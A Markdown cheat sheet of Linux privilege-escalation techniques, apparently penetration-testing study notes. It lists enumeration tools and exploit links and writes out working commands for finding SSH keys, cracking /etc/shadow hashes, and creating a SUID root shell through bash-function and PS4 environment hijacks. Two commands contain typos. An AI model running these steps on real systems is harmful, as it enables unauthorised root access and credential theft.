# Linux Privilege Escalation ## Links * [Basics](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) * [LinEnum](https://github.com/rebootuser/LinEnum) * [Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh) * [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester) * [GTFObins](https://gtfobins.github.io/) * [Linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) ## Kernel Exploits ### Dirty COW * [CVE-2016-5195](https://dirtycow.ninja/) * [c0w.c](../kernel-exploits/dirtycow) ## Stored Keys & Passwords * History * Environment Variables * Config + Dot Files * SSH keys ```sh find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null ``` ## Permissions * Weak permissions * Umask * Unshadow via `unshadow /etc/passd /etc/shadow > unshadow.txt` and john or hashcat. * e.g. `john --wordlist=./wordlist --format=crypt hash` * SUID * list ```sh find / -perm /6000 -ls 2>dev/null ``` * [Shared object injection](../../../exploit/linux/shared_object_injection.md) * [CVE-2016-1247](https://www.cvedetails.com/cve/CVE-2016-1247/) * User specific files ```sh find / -user root -name "*.txt" ``` ## Sudo Binary * [Baron Samedit](../../../exploit/linux/sudo/baron_samedit.md) * [CVE-2019-14287](../../../exploit/linux/sudo/CVE_2019_14287.md) * [CVE-2019-18634](../../../exploit/linux/sudo/CVE_2019_18634.md) * [LD_PRELOAD](../../../exploit/linux/ld_preload.md) * `sudo -l` * Take a look at GTFObins * Keep an eye on the displayed host and env capabilities ## PATH Hijacking * Interpositioning binaries via PATH * Look for binaries used in other bins and scripts * Interposition name and add the directory in front of `$PATH` ## Bash function * Interpositioning of binaries via bash functions ```sh function /path/to/binary() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; } ``` ```sh export -f /path/to/binary ``` * Call binary which invokes this function ## Environment Variable ```sh env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '; set +x; /tmp/bash -p' ``` ## Capabilities * [capabilities](../../../exploit/linux/capabilities.md) ## Crontab * Check `cat /etc/crontab` * Check writable scripts and binaries that are scheduled * Check `$PATH` order ## NFS Rootsquash * [nfs rootsquash](../../../exploit/linux/nfs_rootsquash.md)